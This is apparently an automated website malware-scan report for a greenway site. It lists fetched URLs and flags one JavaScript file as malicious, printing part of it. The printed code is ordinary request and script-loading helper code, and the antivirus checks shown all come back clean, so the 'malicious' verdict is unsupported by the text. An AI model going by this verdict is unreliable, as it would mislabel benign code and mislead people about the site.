Scanned pages/files
| Request | Server response | Status |
|---|---|---|
| http://greenwaysoakridge.org/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 23 Apr 2014 05:55:11 GMT Location: http://domainpark.sitelutions.com/sitelutions_temp_down.html Server: nginx/1.4.1 Content-Length: 160 Content-Type: text/html | clean |
| http://domainpark.sitelutions.com/sitelutions_temp_down.html | 200 OK Content-Length: 4688 Content-Type: text/html | clean |
| http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21987 Content-Type: text/javascript | clean |
| http://greenwaysoakridge.org/info/history | HTTP/1.1 200 OK Connection: close Date: Wed, 23 Apr 2014 05:55:13 GMT Server: nginx/1.4.1 Content-Type: text/html; charset=iso-8859-1 | clean |
| http://tnlandforms.us/greenways/history | 404 Not Found Content-Length: 2532 Content-Type: text/html | clean |
| http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
| http://greenwaysoakridge.org/test404page.js | HTTP/1.1 200 OK Connection: close Date: Wed, 23 Apr 2014 05:55:14 GMT Server: nginx/1.4.1 Content-Type: text/html; charset=iso-8859-1 | clean |
| http://tnlandforms.us/greenways/ | 200 OK Content-Length: 4896 Content-Type: text/html | clean |
| http://tnlandforms.us/greenways/gway1.html | 200 OK Content-Length: 23035 Content-Type: text/html | clean |
| http://tnlandforms.us/greenways/../google.php?trk=phase4 | 200 OK Content-Length: 25533 Content-Type: text/html | clean |
| http://maps.google.com/maps/api/js?sensor=false | 200 OK Content-Length: 4898 Content-Type: text/javascript | clean |
| http://tnlandforms.us/greenways/../js3/gmutils.js | 200 OK Content-Length: 6741 Content-Type: text/javascript | clean |
| http://tnlandforms.us/greenways/../js3/dist.js | 200 OK Content-Length: 7402 Content-Type: text/javascript | clean |
| http://tnlandforms.us/greenways/../js3/util.js | 200 OK Content-Length: 2179 Content-Type: text/javascript | malicious (see below) |
| http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
| http://mytopo.com/TileService/Scripts/trimble.mytopo.v3.js?partnerID=12359&hash=20f54b9ac4bb8b10d66a514e2cf70919 | HTTP/1.1 200 OK Date: Wed, 23 Apr 2014 05:55:24 GMT Accept-Ranges: bytes ETag: "70763b557eace1:28a" Server: Microsoft-IIS/6.0 Content-Length: 7558 Content-Location: http://mytopo.com/TileService/Scripts/trimble.mytopo.v3.js?partnerID=12359&hash=20f54b9ac4bb8b10d66a514e2cf70919 Content-Type: application/x-javascript Last-Modified: Mon, 25 Nov 2013 17:54:05 GMT X-Powered-By: ASP.NET | clean |
| http://mytopo.com/tileservice/scripts/trimble.mytopo.v3.js?partnerid=12359&hash=20f54b9ac4bb8b10d66a514e2cf70919 | HTTP/1.1 200 OK Date: Wed, 23 Apr 2014 05:55:25 GMT Accept-Ranges: bytes ETag: "70763b557eace1:28a" Server: Microsoft-IIS/6.0 Content-Length: 7558 Content-Location: http://mytopo.com/tileservice/scripts/trimble.mytopo.v3.js?partnerid=12359&hash=20f54b9ac4bb8b10d66a514e2cf70919 Content-Type: application/x-javascript Last-Modified: Mon, 25 Nov 2013 17:54:05 GMT X-Powered-By: ASP.NET | clean |
| http://mytopo.com/test404page.js | 200 OK Content-Length: 7647 Content-Type: text/html | clean |
| http://mytopo.com//www.googleadservices.com/pagead/conversion.js/ | 200 OK Content-Length: 7647 Content-Type: text/html | clean |
| http://mytopo.com/index.cfm | 200 OK Content-Length: 11015 Content-Type: text/html | clean |

Malicious code in http://tnlandforms.us/greenways/../js3/util.js - confirmed by antiviruses (see below). The scanner's dump of the file is cut off in the middle of downloadUrl(); the gap is marked in the listing.

```javascript
function createXmlHttpRequest() {
  try {
    if (typeof ActiveXObject != 'undefined') {
      return new ActiveXObject('Microsoft.XMLHTTP');
    } else if (window["XMLHttpRequest"]) {
      return new XMLHttpRequest();
    }
  } catch (e) {
    changeStatus(e);
  }
  return null;
};

function downloadUrl(url, callback) {
  var status = -1;
  var request = createXmlHttpRequest();
  if (!request) {
    return false;
  }
  request.onreadystate
  // ... dump truncated here in the scan report; the rest of downloadUrl()
  // and the start of the XML-parsing function are not shown ...
    var doc = new ActiveXObject('Microsoft.XMLDOM');
    doc.loadXML(str);
    return doc;
  }
  if (typeof DOMParser != 'undefined') {
    return (new DOMParser()).parseFromString(str, 'text/xml');
  }
  return createElement('div', null);
}

function downloadScript(url) {
  var script = document.createElement('script');
  script.src = url;
  document.body.appendChild(script);
}
```

Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: greenwaysoakridge.org
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Wed, 23 Apr 2014 05:55:11 GMT
Location: http://domainpark.sitelutions.com/sitelutions_temp_down.html
Server: nginx/1.4.1
Content-Length: 160
Content-Type: text/html
...160 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: greenwaysoakridge.org
Referer: http://www.google.com/search?q=greenwaysoakridge.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=greenwaysoakridge.org
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://greenwaysoakridge.org/
Result: greenwaysoakridge.org is not infected or malware details are not published yet.